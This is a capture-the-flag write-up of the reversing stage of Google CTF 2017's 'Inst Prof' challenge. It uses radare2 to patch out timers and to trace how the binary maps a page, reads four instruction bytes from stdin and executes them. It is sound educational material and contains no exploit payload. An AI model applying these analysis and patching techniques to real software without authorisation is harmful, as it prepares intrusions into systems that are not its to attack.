GoogleCTF 2017: Inst Prof 152 (final value)

This was a very enjoyable and well thought out challenge from Google CTF. I'd never participated in a Google CTF before, and my expectations were high in terms of difficulty. Needless to say, I was not disappointed in the difficulty department. About halfway through I began thinking of this challenge as the "Instruction Professor" - as in, x86-64 assembly instruction - due to the inordinate amount of x86 assembly I was manually typing out and grokking.

Despite how low-level the work was, I had tons of fun solving this challenge, and learned quite a bit more about Linux, memory, and myself in the process.

If you're just looking for my solution itself (instead of a journaling of my process), simply click here to jump to the solution. If, however, you'd like a little insight into my thought process and techniques involved, please read on.

I've split this writeup into two parts, Reversing and Pwning.

Reversing - In this section I'll go over how I use radare2 to understand how the challenge works. I provide examples and explanations of commands where I can. This section is geared toward those who are less familiar with radare2 or with assembly/reversing in general.

Pwning - This section will illustrate how the challenge program was exploited. I'll go over some early strategies and discoveries that were made, as well as what the solution script does in detail.

Reversing the Binary

After firing up the scoreboard on Friday, I saw the lowest point pwn challenge was Inst Prof, so I puzzled briefly over the flavor text and downloaded the binary:

Please help test our new compiler micro-service
Challenge running at inst-prof.ctfcompetition.com:1337
inst_prof

I took a look at some of the details of the binary:

-> % checksec --file ./inst_prof
RELRO          STACK CANARY     NX          PIE          RPATH     RUNPATH     FILE
Partial RELRO  No canary found  NX enabled  PIE enabled  No RPATH  No RUNPATH  ./inst_prof
-> % file ./inst_prof
./inst_prof: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=61e50b540c3c8e7bcef3cb73f3ad2a10c2589089, not stripped

The thing that stood out to me was that PIE (Position Independent Executable) was turned on, and that NX (No eXecute) was set. Undeterred, I proceeded to shift into mad (computer) scientist mode, and started poking the beast.

I went ahead and ran the program to see what it did. It seemed to sleep() for a few seconds before printing ready:

-> % ./inst_prof
initializing prof...ready
HERPDERP
[1] 19938 segmentation fault (core dumped) ./inst_prof.bak

The most immediate thought I had was that I needed to get rid of the sleep(), otherwise playing with the binary would be a pain every time I started it up. So that was step 1:

Brain Surgery

I opened the binary with radare2 using r2 -d inst_prof to get a better look at what was happening:

[0x7f6844843d80]> s main
[0x559b6f54c860]> pd 30
     ;-- main:
     ;-- section_end..plt:
     ;-- section..text:
     ;-- main:
     0x559b6f54c860  55             push rbp  ; section 13 va=0x559b6f54c860 pa=0x00000860 sz=882 vsz=882 rwx=--r-x .text
     0x559b6f54c861  488d357c0300.  lea rsi, qword str.initializing_prof...  ; 0x559b6f54cbe4 ; "initializing prof..."
     0x559b6f54c868  ba14000000     mov edx, 0x14  ; 20
     0x559b6f54c86d  bf01000000     mov edi, 1
     0x559b6f54c872  4889e5         mov rbp, rsp
     0x559b6f54c875  e836ffffff     call sym.imp.write
     0x559b6f54c87a  4883f814       cmp rax, 0x14  ; 20
 ,=< 0x559b6f54c87e  7407           je 0x559b6f54c887
.--> 0x559b6f54c880  31ff           xor edi, edi
||   0x559b6f54c882  e8a9ffffff     call sym.imp.exit
|`-> 0x559b6f54c887  bf05000000     mov edi, 5
|    0x559b6f54c88c  e8afffffff     call sym.imp.sleep
|    0x559b6f54c891  bf1e000000     mov edi, 0x1e  ; 30
|    0x559b6f54c896  e835ffffff     call sym.imp.alarm
|    0x559b6f54c89b  488d35570300.  lea rsi, qword str.ready_n  ; 0x559b6f54cbf9 ; "ready\n"
|    0x559b6f54c8a2  ba06000000     mov edx, 6
|    0x559b6f54c8a7  bf01000000     mov edi, 1
|    0x559b6f54c8ac  e8fffeffff     call sym.imp.write
|    0x559b6f54c8b1  4883f806       cmp rax, 6  ; 6
`==< 0x559b6f54c8b5  75c9           jne 0x559b6f54c880
     0x559b6f54c8b7  660f1f840000.  nop word [rax + rax]
 .-> 0x559b6f54c8c0  31c0           xor eax, eax
 |   0x559b6f54c8c2  e8f9010000     call sym.do_test
 `=< 0x559b6f54c8c7  ebf7           jmp 0x559b6f54c8c0

s lets you seek to an address (or symbol)
pd # lets you print disassembly of # instructions (from current seek)

Above is the disassembly output of the main function. My eyes were drawn to three calls in particular: sleep(), alarm(), and do_test().

From past CTF experience I knew that sleep() and alarm() were both used as mild deterrents that could easily be disabled. If we look at the first argument to each of these functions (passed in the edi register), we'll see that they're taking five and thirty seconds respectively.

Five seconds was the delay experienced after seeing the initializing prof... message, and indeed we can see above that both the sleep and alarm function calls occur between the writes to STDOUT.

Before moving on to inspecting the do_test function, I performed my first operation:

-> % r2 -w inst_prof
[0x000008c9]> wx 9090909090 @ 0x88c
[0x000008c9]> wx 9090909090 @ 0x896
[0x000008c9]> s main
[0x00000860]> pd 32
     ;-- main:
     ;-- section_end..plt:
     ;-- section..text:
     ;-- main:
     0x00000860  55             push rbp  ; section 13 va=0x00000860 pa=0x00000860 sz=882 vsz=882 rwx=--r-x .text
     0x00000861  488d357c0300.  lea rsi, qword str.initializing_prof...  ; 0xbe4 ; "initializing prof..."
     0x00000868  ba14000000     mov edx, 0x14
     0x0000086d  bf01000000     mov edi, 1
     0x00000872  4889e5         mov rbp, rsp
     0x00000875  e836ffffff     call sym.imp.write
     0x0000087a  4883f814       cmp rax, 0x14
 ,=< 0x0000087e  7407           je 0x887
.--> 0x00000880  31ff           xor edi, edi
||   0x00000882  e8a9ffffff     call sym.imp.exit
|`-> 0x00000887  bf05000000     mov edi, 5
|    0x0000088c  90             nop
|    0x0000088d  90             nop
|    0x0000088e  90             nop
|    0x0000088f  90             nop
|    0x00000890  90             nop
|    0x00000891  bf1e000000     mov edi, 0x1e
|    0x00000896  90             nop
|    0x00000897  90             nop
|    0x00000898  90             nop
|    0x00000899  90             nop
|    0x0000089a  90             nop
|    0x0000089b  488d35570300.  lea rsi, qword str.ready_n  ; 0xbf9 ; "ready\n"
|    0x000008a2  ba06000000     mov edx, 6
|    0x000008a7  bf01000000     mov edi, 1
|    0x000008ac  e8fffeffff     call sym.imp.write
|    0x000008b1  4883f806       cmp rax, 6
`==< 0x000008b5  75c9           jne 0x880
     0x000008b7  660f1f840000.  nop word [rax + rax]
 .-> 0x000008c0  31c0           xor eax, eax
 |   0x000008c2  e8f9010000     call sym.do_test
 `=< 0x000008c7  ebf7           jmp 0x8c0

Invoking radare2 with the -w switch opens the binary file in write mode, allowing radare2 to write data to the file. The wx command is short for write hex, and writes raw bytes either at the current seek or, with @, at a temporary seek offset. Notice that the addresses (left column) no longer represent virtual addresses of a process, but rather offsets into the file on disk. Then notice that the least significant 12 bits are the same in the file as in the process! This is because the binary is mapped at a page-aligned base address: pages are 0x1000 bytes, so the base that the text section is loaded at (when it becomes a process) always has its least significant 12 bits unset (all 0's).
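To make the low-12-bits observation concrete, here is a small Python sketch (my own illustration, not part of the original workflow). It uses the two addresses of the sleep call seen in the listings above and assumes the usual 4 KiB page size; the helper name page_offset is made up.

```python
PAGE_SIZE = 0x1000  # 4 KiB pages, assumed (standard on x86-64 Linux)


def page_offset(addr: int) -> int:
    """Return the offset of addr inside its page (the low 12 bits)."""
    return addr & (PAGE_SIZE - 1)


runtime_sleep_call = 0x559b6f54c88c  # call sym.imp.sleep in the debugged process
file_sleep_call = 0x88c              # the same instruction in the file on disk

# The low 12 bits survive relocation because the load base is page aligned.
print(hex(page_offset(runtime_sleep_call)))
print(hex(runtime_sleep_call - file_sleep_call))
```

The second value printed is the load base for that particular run; it changes on every execution because of PIE, but it always ends in three zero hex digits.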

We can see that the two commands issued wrote 0x90 five times at each of the addresses 0x88c and 0x896, which fully overwrote both the sleep and alarm calls with nops. So now the binary will no longer pause or get the alarm signal sent to it (which may or may not have broken something later down the road).
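The same patch can be sketched in Python instead of radare2. This is only an illustration: nop_out is a hypothetical helper, and instead of opening the real file it operates on a copy of the 20 bytes of main that start at file offset 0x887 (taken from the disassembly above).

```python
NOP = 0x90
CALL_REL32_LEN = 5  # opcode e8 plus a 4-byte relative displacement


def nop_out(image: bytearray, offset: int, length: int = CALL_REL32_LEN) -> None:
    """Overwrite `length` bytes at `offset` with NOPs, in place."""
    if image[offset] != 0xE8:
        raise ValueError(f"no call opcode at {offset:#x}")
    image[offset:offset + length] = bytes([NOP]) * length


# Stand-in for the bytes of main at file offsets 0x887..0x89a:
# mov edi, 5 / call sleep / mov edi, 0x1e / call alarm
BASE = 0x887
snippet = bytearray.fromhex("bf05000000" "e8afffffff" "bf1e000000" "e835ffffff")

nop_out(snippet, 0x88c - BASE)  # the sleep call
nop_out(snippet, 0x896 - BASE)  # the alarm call
print(snippet.hex())
```

Against the real binary you would read the whole file into the bytearray, call nop_out with the file offsets directly, and write the result to a copy rather than the original.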

Under the Microscope

Now that the speed bumps were removed, it was time to take a look at the do_test function. I took note that the instruction after calling do_test is an unconditional jmp to clearing the eax register just before calling the same function; an endless loop.

Then I disassembled the function:

[0x562bd0896860]> pd @ sym.do_test
    ;-- do_test:
    0x562bd0896ac0  55             push rbp
    0x562bd0896ac1  31c0           xor eax, eax
    0x562bd0896ac3  4889e5         mov rbp, rsp
    0x562bd0896ac6  4154           push r12
    0x562bd0896ac8  53             push rbx
    0x562bd0896ac9  4883ec10       sub rsp, 0x10
    0x562bd0896acd  e81effffff     call sym.alloc_page
    0x562bd0896ad2  4889c3         mov rbx, rax
    0x562bd0896ad5  488d05240100.  lea rax, qword sym.template  ; obj.template ; 0x562bd0896c00
    0x562bd0896adc  488d7b05       lea rdi, qword [rbx + 5]  ; 5
    0x562bd0896ae0  488b10         mov rdx, qword [rax]
    0x562bd0896ae3  488913         mov qword [rbx], rdx
    0x562bd0896ae6  8b5008         mov edx, dword [rax + 8]  ; [0x8:4]=-1 ; 8
    0x562bd0896ae9  895308         mov dword [rbx + 8], edx
    0x562bd0896aec  0fb7500c       movzx edx, word [rax + 0xc]  ; [0xc:2]=0xffff ; 12
    0x562bd0896af0  0fb6400e       movzx eax, byte [rax + 0xe]  ; [0xe:1]=255 ; 14
    0x562bd0896af4  6689530c       mov word [rbx + 0xc], dx
    0x562bd0896af8  88430e         mov byte [rbx + 0xe], al
    0x562bd0896afb  e8b0ffffff     call sym.read_inst
    0x562bd0896b00  4889df         mov rdi, rbx
    0x562bd0896b03  e818ffffff     call sym.make_page_executable
    0x562bd0896b08  0f31           rdtsc
    0x562bd0896b0a  48c1e220       shl rdx, 0x20
    0x562bd0896b0e  4989c4         mov r12, rax
    0x562bd0896b11  31c0           xor eax, eax
    0x562bd0896b13  4909d4         or r12, rdx
    0x562bd0896b16  ffd3           call rbx
    0x562bd0896b18  0f31           rdtsc
    0x562bd0896b1a  bf01000000     mov edi, 1
    0x562bd0896b1f  48c1e220       shl rdx, 0x20
    0x562bd0896b23  488d75e8       lea rsi, qword [rbp - 0x18]
    0x562bd0896b27  4809c2         or rdx, rax
    0x562bd0896b2a  4c29e2         sub rdx, r12
    0x562bd0896b2d  488955e8       mov qword [rbp - 0x18], rdx
    0x562bd0896b31  ba08000000     mov edx, 8
    0x562bd0896b36  e875fcffff     call sym.imp.write
    0x562bd0896b3b  4883f808       cmp rax, 8  ; 8
,=< 0x562bd0896b3f  7511           jne 0x562bd0896b52
|   0x562bd0896b41  4889df         mov rdi, rbx
|   0x562bd0896b44  e8f7feffff     call sym.free_page
|   0x562bd0896b49  4883c410       add rsp, 0x10
|   0x562bd0896b4d  5b             pop rbx
|   0x562bd0896b4e  415c           pop r12
|   0x562bd0896b50  5d             pop rbp
|   0x562bd0896b51  c3             ret
`-> 0x562bd0896b52  31ff           xor edi, edi
    0x562bd0896b54  e8d7fcffff     call sym.imp.exit
    0x562bd0896b59  0f1f80000000.  nop dword [rax]

We can see above in the disassembly the calls that do_test makes: alloc_page, read_inst, make_page_executable, call rbx, write, and free_page. Of particular interest is the call rbx instruction which comes after the make_page_executable function. Without digging deeper, my assumption for why the program crashed was that it was expecting me to input x86 instructions (in read_inst) that would get executed (after make_page_executable), which HERPDERP definitely was not.

To see if this was right, I needed to look at the three calls before the one to rbx.

Pagemaster

First I looked at alloc_page :

[0x5635884f4ac0]> pd @ sym.alloc_page
|||   ;-- alloc_page:
|||   0x5635884f49f0  55             push rbp
|||   0x5635884f49f1  4531c9         xor r9d, r9d
|||   0x5635884f49f4  41b8ffffffff   mov r8d, 0xffffffff  ; -1
|||   0x5635884f49fa  b922000000     mov ecx, 0x22  ; '"' ; 34
|||   0x5635884f49ff  ba03000000     mov edx, 3
|||   0x5635884f4a04  be00100000     mov esi, 0x1000
|||   0x5635884f4a09  4889e5         mov rbp, rsp
|||   0x5635884f4a0c  31ff           xor edi, edi
|||   0x5635884f4a0e  5d             pop rbp
||`=< 0x5635884f4a0f  e9acfdffff     jmp sym.imp.mmap
||    0x5635884f4a14  6666662e0f1f.  nop word cs:[rax + rax]

I saw that it is a thin wrapper which sets up arguments and then jumps to mmap. Looking at the man page for mmap using man 2 mmap revealed the function signature:

void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);

as well as some additional information about the parameters, especially the prot parameter, which is supplied as a bitwise OR of the following:

-> % cat /usr/include/bits/mman-linux.h | grep -P '#define\s+PROT'
#define PROT_READ       0x1             /* Page can be read. */
#define PROT_WRITE      0x2             /* Page can be written. */
#define PROT_EXEC       0x4             /* Page can be executed. */
#define PROT_NONE       0x0             /* Page can not be accessed. */
#define PROT_GROWSDOWN  0x01000000      /* Extend change to start of
#define PROT_GROWSUP    0x02000000      /* Extend change to start of

Since we know that the first six integer arguments on x86-64 Linux are supplied in the registers rdi, rsi, rdx, rcx, r8, r9 (in that order), we can see the call to mmap is made as:

mmap(0, 0x1000, PROT_READ | PROT_WRITE, 0x22, 0xffffffff, 0)

This creates a new mapped region of memory that is 0x1000 bytes large, at a starting address chosen by the kernel, that is readable and writable. The start address of the mmaped region is returned in the rax register.
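For completeness, the raw numbers in that call can be decoded with a few lines of Python. This is a sketch under assumptions: the PROT_* values are the ones from the header output above, the MAP_* values are the standard Linux x86-64 ones (they are not shown anywhere in this writeup), and decode and to_signed32 are helper names I made up.

```python
# PROT_* values as printed from mman-linux.h above.
PROT = {0x1: "PROT_READ", 0x2: "PROT_WRITE", 0x4: "PROT_EXEC"}
# MAP_* values assumed from the Linux x86-64 headers.
MAP = {0x01: "MAP_SHARED", 0x02: "MAP_PRIVATE", 0x10: "MAP_FIXED", 0x20: "MAP_ANONYMOUS"}


def decode(value: int, names: dict) -> str:
    """Render a bit mask as the OR of its named flags."""
    parts = [name for bit, name in names.items() if value & bit]
    return " | ".join(parts) if parts else "0"


def to_signed32(value: int) -> int:
    """Interpret a 32-bit register value as a signed int (for the fd argument)."""
    return (value ^ 0x80000000) - 0x80000000


print("prot  =", decode(3, PROT))
print("flags =", decode(0x22, MAP))
print("fd    =", to_signed32(0xFFFFFFFF))
```

Read this way, the call asks for a private anonymous mapping that is not backed by any file, which is consistent with fd being -1 and offset being 0.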

Looking back at the above disassembly of do_test, I saw after the alloc_page that something was occurring before the read_inst call involving something that radare labeled as obj.template.

Before trying to understand the code, I took a look at the obj.template :

[0x5635884f4ac0]> pxq 0x10 @ obj.template
0x5635884f4c00  0x90909000001000b9  0x00c3f77501e98390  ............u...
[0x5635884f4ac0]> pd 8 @ obj.template
    ;-- template:
    0x5635884f4c00  b900100000  mov ecx, 0x1000
.-> 0x5635884f4c05  90          nop
|   0x5635884f4c06  90          nop
|   0x5635884f4c07  90          nop
|   0x5635884f4c08  90          nop
|   0x5635884f4c09  83e901      sub ecx, 1
`=< 0x5635884f4c0c  75f7        jne 0x5635884f4c05
    0x5635884f4c0e  c3          ret

The pxq # command prints # bytes as hex quadwords (in little endian) starting at the offset specified (obj.template in this case), so pxq 0x10 shows two quadwords.

Hmm, it looks as if the obj.template is potentially a loop function of some sort. It appears to execute nop four times in a loop which repeats 0x1000 times.

Taking a long look at the assembly which references this obj.template gave me an understanding of what it did with it:

0x5635884f4acd  e81effffff     call sym.alloc_page
0x5635884f4ad2  4889c3         mov rbx, rax                ;save addr of new page (from rax)
0x5635884f4ad5  488d05240100.  lea rax, qword obj.template ;load obj.template addr
0x5635884f4adc  488d7b05       lea rdi, qword [rbx + 5]    ;seek 5 into new page
0x5635884f4ae0  488b10         mov rdx, qword [rax]        ;copy first 8 bytes of obj.template
0x5635884f4ae3  488913         mov qword [rbx], rdx        ;paste them into new page
0x5635884f4ae6  8b5008         mov edx, dword [rax + 8]    ;copy template bytes 0x8 to 0xb
0x5635884f4ae9  895308         mov dword [rbx + 8], edx    ;paste into bytes 0x8 to 0xb
0x5635884f4aec  0fb7500c       movzx edx, word [rax + 0xc] ;copy template bytes 0xc and 0xd
0x5635884f4af0  0fb6400e       movzx eax, byte [rax + 0xe] ;copy last template byte
0x5635884f4af4  6689530c       mov word [rbx + 0xc], dx    ;paste template bytes 0xc and 0xd
0x5635884f4af8  88430e         mov byte [rbx + 0xe], al    ;paste last template byte (0xe)
0x5635884f4afb  e8b0ffffff     call sym.read_inst

If that was still unclear, essentially the 15 template bytes are copied into the start of the newly allocated page we got from alloc_page.

Up to this point I'd only been taking a look at the code statically, however I decided to run it to check my understanding. I ran the code after setting breakpoints on both the alloc_page and read_inst calls:

[0x5635884f4ac0]> db 0x5635884f4acd
[0x5635884f4ac0]> db 0x5635884f4afb
[0x5635884f4ac0]> dc
Selecting and continuing: 2864
initializing prof...ready
hit breakpoint at: 5635884f4acd
[0x5635884f4acd]> dr rax
0x00000000
[0x5635884f4acd]> dso
hit breakpoint at: 5635884f4ad2
[0x5635884f4acd]> dr rax
0x7f0f9b91c000
[0x5635884f4acd]> pxq 0x10 @ 0x7f0f9b91c000
0x7f0f9b91c000  0x0000000000000000  0x0000000000000000  ................
[0x5635884f4acd]> dc
Selecting and continuing: 2864
hit breakpoint at: 5635884f4afb
[0x5635884f4acd]> pxq 0x10 @ 0x7f0f9b91c000
0x7f0f9b91c000  0x90909000001000b9  0x00c3f77501e98390  ............u...

db is the debug breakpoint command; dc is the debug continue command
dr is the debug register command; dso is the debug step over command

From the above output I verified that the obj.template data was copied into the region mapped by alloc_page, and using the dm (debug memory [map]) command showed me that a new page had been mapped for the process (the 4K rw- region at 0x00007f0f9b91c000, annotated with rbx):

[0x5635884f4acd]> dm
sys   4K 0x00005635884f4000 * 0x00005635884f5000 s -r-x /googleCTF_06-2017/pwn_inst-prof/inst_prof ; map._googleCTF_06_2017_pwn_inst_prof_inst_prof._r_x
sys   4K 0x00005635886f5000 - 0x00005635886f6000 s -r-- /googleCTF_06-2017/pwn_inst-prof/inst_prof ; map._googleCTF_06_2017_pwn_inst_prof_inst_prof._rw_
sys   4K 0x00005635886f6000 - 0x00005635886f7000 s -rw- /googleCTF_06-2017/pwn_inst-prof/inst_prof ; obj._GLOBAL_OFFSET_TABLE_
sys 1.6M 0x00007f0f9b357000 - 0x00007f0f9b4f2000 s -r-x /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys 2.0M 0x00007f0f9b4f2000 - 0x00007f0f9b6f1000 s ---- /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys  16K 0x00007f0f9b6f1000 - 0x00007f0f9b6f5000 s -r-- /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys   8K 0x00007f0f9b6f5000 - 0x00007f0f9b6f7000 s -rw- /usr/lib/libc-2.25.so /usr/lib/libc-2.25.so
sys  16K 0x00007f0f9b6f7000 - 0x00007f0f9b6fb000 s -rw- unk0 unk0
sys 140K 0x00007f0f9b6fb000 - 0x00007f0f9b71e000 s -r-x /usr/lib/ld-2.25.so /usr/lib/ld-2.25.so ; map._usr_lib_ld_2.25.so._r_x
sys   8K 0x00007f0f9b8cc000 - 0x00007f0f9b8ce000 s -rw- unk1 unk1
sys   4K 0x00007f0f9b91c000 - 0x00007f0f9b91d000 s -rw- unk2 unk2 ; rbx
sys   4K 0x00007f0f9b91d000 - 0x00007f0f9b91e000 s -r-- /usr/lib/ld-2.25.so /usr/lib/ld-2.25.so ; map._usr_lib_ld_2.25.so._rw_
sys   4K 0x00007f0f9b91e000 - 0x00007f0f9b91f000 s -rw- /usr/lib/ld-2.25.so /usr/lib/ld-2.25.so
sys   4K 0x00007f0f9b91f000 - 0x00007f0f9b920000 s -rw- unk3 unk3 ; map.unk0._rw_
sys 132K 0x00007ffc046ac000 - 0x00007ffc046cd000 s -rw- [stack] [stack] ; map._stack_._rw_
sys   8K 0x00007ffc0479e000 - 0x00007ffc047a0000 s -r-- [vvar] [vvar] ; map._vvar_._r__
sys   8K 0x00007ffc047a0000 - 0x00007ffc047a2000 s -r-x [vdso] [vdso] ; map._vdso_._r_x
sys   4K 0xffffffffff600000 - 0xffffffffff601000 s -r-x [vsyscall] [vsyscall] ; map._vsyscall_._r_x

So far, so good. Now I just had to look at and understand the remaining two functions in do_test: read_inst and make_page_executable.

Instruct Radare

[0x562e80db3ab0]> pd 6 @ sym.read_inst
/ (fcn) sym.read_inst 63
|   sym.read_inst ();
| |      ; CALL XREF from 0x562e80db3afb (sym.do_test)
| |      0x562e80db3ab0  55          push rbp
| |      0x562e80db3ab1  be04000000  mov esi, 4
| |      0x562e80db3ab6  4889e5      mov rbp, rsp
| |      0x562e80db3ab9  5d          pop rbp
\ `=<    0x562e80db3aba  e9c1ffffff  jmp sym.read_n
         0x562e80db3abf  90          nop
[0x562e80db3ab0]> pd @ sym.read_n
  .->    ;-- read_n:
  |      ; JMP XREF from 0x562e80db3aba (sym.read_inst)
| .->    0x562e80db3a80  55          push rbp
| |      0x562e80db3a81  4885f6      test rsi, rsi
| |      0x562e80db3a84  4889e5      mov rbp, rsp
| |      0x562e80db3a87  4154        push r12
| |      0x562e80db3a89  4c8d2437    lea r12, qword [rdi + rsi]
| |      0x562e80db3a8d  53          push rbx
| |      0x562e80db3a8e  4889fb      mov rbx, rdi
| ,==<   0x562e80db3a91  7418        je 0x562e80db3aab
| ||     0x562e80db3a93  0f1f440000  nop dword [rax + rax]
| .--->  0x562e80db3a98  31c0        xor eax, eax
| |||    0x562e80db3a9a  4883c301    add rbx, 1
| |||    0x562e80db3a9e  e8adffffff  call sym.read_byte  ; ssize_t read(int fildes, void *buf, size_t nbyte)
| |||    0x562e80db3aa3  8843ff      mov byte [rbx - 1], al
| |||    0x562e80db3aa6  4c39e3      cmp rbx, r12
| `===<  0x562e80db3aa9  75ed        jne 0x562e80db3a98
| `-->   0x562e80db3aab  5b          pop rbx
| |      0x562e80db3aac  415c        pop r12
| |      0x562e80db3aae  5d          pop rbp
| |      0x562e80db3aaf  c3          ret

We can see from the disassembly of read_inst above that the value of 4 is passed via the rsi register to read_n.

In the read_n function, rsi is immediately tested, which would set the ZF flag if it was 0 and short-circuit the function via the je instruction at address 0x562e80db3a91. In our case it's always set to 4, and so the value is then combined with rdi by the instruction lea r12, qword [rdi + rsi].

r12 therefore holds the end address (start plus count). It is compared against the write cursor in rbx just before the jne instruction at 0x562e80db3aa9, which bounds how many times call sym.read_byte is made: the function returns once the number of bytes passed via rsi (0x4 in our case) has been read.

Looking at the read_byte function reveals:

[0x562e80db3ab0]> pd @ sym.read_byte
/ (fcn) sym.read_byte 47
|   sym.read_byte ();
|       ; var int local_1h @ rbp-0x1
|       ; CALL XREF from 0x562e80db3a9e (sym.read_inst)
|       0x562e80db3a50  55          push rbp
|       0x562e80db3a51  31ff        xor edi, edi
|       0x562e80db3a53  ba01000000  mov edx, 1
|       0x562e80db3a58  4889e5      mov rbp, rsp
|       0x562e80db3a5b  4883ec10    sub rsp, 0x10
|       0x562e80db3a5f  488d75ff    lea rsi, qword [local_1h]
|       0x562e80db3a63  c645ff00    mov byte [local_1h], 0
|       0x562e80db3a67  e874fdffff  call sym.imp.read  ; ssize_t read(int fildes, void *buf, size_t nbyte)
|       0x562e80db3a6c  4883f801    cmp rax, 1  ; 1
|   ,=< 0x562e80db3a70  7506        jne 0x562e80db3a78
|   |   0x562e80db3a72  0fb645ff    movzx eax, byte [local_1h]
|   |   0x562e80db3a76  c9          leave
|   |   0x562e80db3a77  c3          ret
|   `-> 0x562e80db3a78  31ff        xor edi, edi
\       0x562e80db3a7a  e8b1fdffff  call sym.imp.exit  ; void exit(int status)
        0x562e80db3a7f  90          nop

Here we finally see the call to sym.imp.read, the libc function that reads a given number of bytes from a file descriptor.

I set a breakpoint on the call to sym.imp.read (at 0x562e80db3a67) to see what its parameters were:

[0x562e80db3ab0]> db 0x562e80db3a67
[0x562e80db3a67]> pd 1
|   ;-- rip:
|   0x562e80db3a67 b  e874fdffff  call sym.imp.read  ; ssize_t read(int fildes, void *buf, size_t nbyte)
[0x562e80db3a67]> dr rdi; dr rsi; dr rdx
0x00000000
0x7ffd632550af
0x00000001

We can see that it's reading from fd 0 (file descriptor 0), which is STDIN. It's reading into memory address 0x7ffd632550af, and reading only a single byte.

After reading a single byte from STDIN, read_byte returns it in eax, and read_n writes it to [rbx - 1].
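Put together, read_inst, read_n and read_byte behave roughly like the Python sketch below. This is my own paraphrase of the disassembly rather than code from the challenge: the stream stands in for STDIN, the bytearray stands in for the freshly mapped page, and the comments note which register each variable mirrors.

```python
import io


def read_n(stream, buf: bytearray, start: int, n: int) -> None:
    """Copy exactly n bytes from stream into buf[start:start + n], one at a time."""
    cursor, end = start, start + n      # rbx (cursor) and r12 (end address)
    while cursor != end:                # cmp rbx, r12 / jne
        byte = stream.read(1)           # read_byte: read(0, &local, 1)
        if len(byte) != 1:
            raise SystemExit(0)         # read_byte calls exit(0) on a short read
        buf[cursor] = byte[0]           # mov byte [rbx - 1], al
        cursor += 1                     # add rbx, 1


def read_inst(stream, page: bytearray) -> None:
    """read_inst: always read 4 bytes, starting 5 bytes into the page."""
    read_n(stream, page, 5, 4)


page = bytearray(15)
read_inst(io.BytesIO(b"\xc3" * 4), page)
print(page.hex())
```

Only offsets 5 through 8 of the page are ever touched, which is why exactly four bytes of input are consumed per iteration.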

I let the process run 4 times, sending 0xc3 each time, and stepped back until I was at do_test, where I found that the 4 bytes are read into the copied obj.template, which is currently stored at the address in rbx:

[0x55cc2a53eaf8]> pd 8 @ rbx
    ;-- map.unk2._rw_:
    ;-- rbx:
    0x7feffd3ea000  b900100000  mov ecx, 0x1000
,=> 0x7feffd3ea005  c3          ret
|   0x7feffd3ea006  c3          ret
|   0x7feffd3ea007  c3          ret
|   0x7feffd3ea008  c3          ret
|   0x7feffd3ea009  83e901      sub ecx, 1
`-< 0x7feffd3ea00c  75f7        jne 0x7feffd3ea005
    0x7feffd3ea00e  c3          ret

Notice that the 4 nop instructions from the template were overwritten with the bytes I supplied (0xc3 in this case).
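The page contents after read_inst can be modelled offline, which is handy for checking what a given 4-byte input will look like before sending it. A minimal sketch, assuming only the 15 template bytes dumped earlier; fill_template is a hypothetical helper name.

```python
TEMPLATE = bytes.fromhex(
    "b900100000"  # mov ecx, 0x1000
    "90909090"    # four nop placeholders (offsets 5..8)
    "83e901"      # sub ecx, 1
    "75f7"        # jne back to offset 5
    "c3"          # ret
)
INST_OFFSET = 5
INST_LEN = 4


def fill_template(inst: bytes) -> bytes:
    """Return the template with its four placeholder bytes replaced by inst."""
    if len(inst) != INST_LEN:
        raise ValueError("read_inst always consumes exactly 4 bytes")
    return TEMPLATE[:INST_OFFSET] + inst + TEMPLATE[INST_OFFSET + INST_LEN:]


page = fill_template(b"\xc3" * 4)
print(page.hex())
```

Feeding the result to a disassembler (for example rasm2 -d) should reproduce the listing above for the 0xc3 case.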

Feeling comfortable that I understood everything so far, I took a look at make_page_executable.

It'll Give You Wings

Looking at do_test, we see that just prior to calling make_page_executable, the address of our copied template (stored in rbx) is moved into rdi:

[0x55cc2a53eb00]> pd 2
|   ;-- rip:
|   0x55cc2a53eb00  4889df      mov rdi, rbx
|   0x55cc2a53eb03  e818ffffff  call sym.make_page_executable

Then when we look at make_page_executable :

[0x55cc2a53eb00]> pd @ sym.make_page_executable
/ (fcn) sym.make_page_executable 20
|   sym.make_page_executable ();
| ||     ; CALL XREF from 0x55cc2a53eb03 (sym.do_test)
| ||     0x55cc2a53ea20  55          push rbp
| ||     0x55cc2a53ea21  ba05000000  mov edx, 5
| ||     0x55cc2a53ea26  be00100000  mov esi, 0x1000
| ||     0x55cc2a53ea2b  4889e5      mov rbp, rsp
| ||     0x55cc2a53ea2e  5d          pop rbp
\ `==<   0x55cc2a53ea2f  e9ecfdffff  jmp sym.imp.mprotect

We see that it is just a wrapper around mprotect, which has the signature:

int mprotect(void *addr, size_t len, int prot)

This wrapped call to mprotect uses the address in rdi (our copied template with 4 custom instruction bytes) as the target address. len is set via rsi being 0x1000, which is one 4k page, and prot is set via rdx being 0x05 (PROT_READ | PROT_EXEC), which marks the region as readable and executable.

Back in do_test, we see that rbx (which also holds the address of our copied template) is directly called, which will execute our 4 bytes' worth of instructions 0x1000 times in a loop before returning.

Once this is done, do_test reads the timestamp counter again with rdtsc, subtracts the reading it saved in r12 before the call, and writes the 8-byte difference (the number of cycles our code took) to STDOUT. I didn't pay this much attention while solving the challenge, and would only later learn that I could have used this functionality to leak data from the process.
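As a rough illustration of that timing logic, the sketch below rebuilds the 64-bit counter from the edx:eax halves the way do_test does (shl rdx, 0x20 then or), and decodes the 8 bytes that come back over the socket. The function names and the sample readings are made up for the example.

```python
import struct

MASK64 = 0xFFFFFFFFFFFFFFFF


def tsc_value(edx: int, eax: int) -> int:
    """Combine the two 32-bit halves returned by rdtsc into one 64-bit count."""
    return ((edx & 0xFFFFFFFF) << 32) | (eax & 0xFFFFFFFF)


def parse_delta(raw: bytes) -> int:
    """Decode the 8 bytes do_test writes to stdout as a little-endian u64."""
    (delta,) = struct.unpack("<Q", raw)
    return delta


# Made-up readings taken before and after `call rbx`.
start = tsc_value(0x1, 0xFFFFFF00)
end = tsc_value(0x2, 0x00000100)

wire = struct.pack("<Q", (end - start) & MASK64)  # what write(1, ..., 8) would send
print(parse_delta(wire))
```

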